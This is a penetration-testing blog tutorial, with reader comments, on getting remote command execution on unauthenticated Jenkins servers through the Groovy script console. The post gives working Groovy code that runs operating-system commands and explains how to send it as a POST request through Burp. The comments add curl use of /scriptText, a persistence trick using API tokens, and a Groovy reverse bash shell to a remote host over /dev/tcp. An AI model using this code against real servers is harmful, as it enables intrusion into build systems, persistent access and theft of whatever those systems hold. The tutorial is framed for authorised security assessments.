Hacking Jenkins Servers With No Password
Here’s a fun Jenkins trick I have been using on some recent Information Security Assessments to gain an initial foothold. If you aren’t familiar with hacking Jenkins servers, it runs by default on port 8080 and also by default it has no password (Hurray!). According to their Wiki: “Jenkins is an award-winning application that monitors executions of repeated jobs, such as building a software project or jobs run by cron.” Here is what Jenkins looks like.
This is some Groovy script right here – Jenkins
Conveniently, Jenkins has a native interpreter for the “Groovy Script” language which it selflessly offers up to you via the “/script” directory. Click on the “Manage Jenkins” link in the left-hand navigation pane and then “Script Console” from the main menu. Here is what Jenkins gives you.
Hacking Jenkins Free Video
Lets have some fun – Jenkins
Now, if you’re like me and you haven’t even heard of Groovy Script much less know how to write in it, you’re in luck because it is in fact 2014 and we all have smart phones with unlimited access to the all powerful Google Machine! Click on a few links here and there skim through a few paragraphs and you’ll see that we can use Jenkins to execute some Groovy operating system commands with the following:
def sout = new StringBuffer(), serr = new StringBuffer() def proc = '[INSERT COMMAND]'.execute() proc.consumeProcessOutput(sout, serr) proc.waitForOrKill(1000) println "out> $sout err> $serr"
This doesn’t appear overly complex but for the sake of completeness lets walk through it:
- 1. We declare two objects of type “StringBuffer”. ‘sout’ and ‘serr’
- 2. Next we store the result of running the .execute() method on a string which should be a valid os command in the variable ‘proc’
- 3. Grab the process output using the .consumeProcessOutput() method passing in our two string buffers as per the method definition
- 4. This line just sets a timeout counter that will kill the process if it doesn’t finish on its own
- 5. Finally we print the process output and any errors that were generated
Cool, so that should be easy enough lets use Jenkins to paste that into our console window and run some OS commands. All we need to do is substitute “[INSERT COMMAND]” with what we want to run. We’ll start with a simple “dir” command.
Damn! (shouted with an English accent for added flare) we got an error. Alright lets work this out. The error says “Cannot run program “dir”: CreateProcess error=2, The system cannot find the file specified…” Well that makes sense “dir” isn’t a file on the target system it is a component to cmd.exe. Lets tell Jenkins to run that instead.
Getting closer. So from the looks of it dGroovy Script just spawned an instance of cmd.exe however we can’t interact with it. So lets try passing a command via the /C parameter. “cmd.exe /c dir” should do the trick I think.
Executing Groovy Script Through Burp Suite- Jenkins
It may be necessary to feed your payload through an interception proxy like Burp Suite. This is extremely straight forward. Simply send a POST request to ‘/script’ and include the necessary parameters. Make sure to URL encode your script so it executes. Here is an example which should show you everything you need.
Conclusion – Jenkins
So there you have it. A simple, one line at a time command execution gateway. A valuable find when Penetration Testing. Surely you can think of creative ways to turn this access into something bigger and better like a Meterpreter shell, I’ll leave that piece up to you. Also, its worth noting that there is a Metasploit module for this already. I have yet to be successful with it but you might have different results so be sure to check it out. Jenkins Script-Console Java Execution Thank you for reading and as always, hack responsibly!
Jenkins – Related Reading
Share this article
Leave a Reply
Share This
Recent Posts
- Playing With the New Burp Suite REST API
- Burp Suite 2.0 Beta Review
- Attacking Palo Alto Networks PAN-OS ‘readSessionVarsFromFile()’
- GPG Errors While Updating Kali Linux
- Installing Kali NetHunter on HTC Nexus 9
Subscribe To Our Mailing List
The Ultimate Burp Suite Training Program
Learn Network Penetration Testing
Penetration Testing
Categories
- AWBS
- Burp Suite
- Definitions
- Forensics and Incident Response
- Information Gathering
- Metasploit
- Penetration Testing Tutorials
- Phishing
- Presentations
- Tools
- Web Applications
- Wireless
Also, if you hit /scriptText instead of /script you can strip away all of the HTML output from the browser version, which makes it nice and scriptable with curl :)
Jenkins uses basic auth, so curl will take -u username:password ORRRR -u username:apitoken. The apitoken will survive a password rotation, so it’s a sneaky way to maintain persistence.
Thanks Savant, your input is highly valuable as usual!
you wouldn’t happen to be able to provide the http request for a any of groovy scripts mentioned above would you? I’m trying to do this via burp repeater but can’t figure out the post format to include a multi line script
Hi Jeff,
This is easy to accomplish. I have updated the article with a brief explanation and screenshot example. Hopefully that helps!
Below provides a nice reverse bash for linux hosts from the Jenkins script console, taken from pentestmonkey.
r = Runtime.getRuntime()
p = r.exec([“/bin/bash”,”-c”,”exec 5/dev/tcp/10.0.0.0/8080;cat &5 >&5; done”] as String[])
p.waitFor()
Or just use the terminal plugin ;/
https://wiki.jenkins-ci.org/display/JENKINS/Terminal+Plugin